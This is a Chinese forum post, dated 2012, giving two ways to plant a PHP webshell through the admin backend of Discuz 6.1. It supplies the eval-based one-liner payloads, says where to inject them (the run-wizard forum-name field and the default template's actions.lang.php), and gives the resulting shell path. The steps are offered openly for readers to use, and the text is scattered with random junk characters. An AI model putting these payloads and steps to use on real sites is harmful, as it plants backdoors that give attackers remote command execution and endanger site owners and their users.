discuz6.1两种方法后台拿shell( r" f e, Q' g
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
9 r1 }: K2 G: p0 t1:+ ?2 l; \2 o' I% z
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
0 A6 d# P; f6 a! p9 x+ Sadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
6 E' p) Q( f% x7 o. s5 r! ]; @- p: b<?php eval($_POST[cmd]);?>$ y, x4 G& K$ v
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
% \! [; z& @7 T' ~3 e" N7 _7 P+ ^7 G# i
; B8 a9 P5 _' S% b3 H6 `* F. ~! E: d
2:后台模板管理--默认模板套系--详情8 S4 {9 |; B1 m! o
templates/default/actions.lang.php
- `! u+ k2 w: G7 t* g( b Ujhackj\\');eval($_POST[cmd])?>;//
( E$ F: \4 v, H8 I* f
' Q' u, \) h& s6 H利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对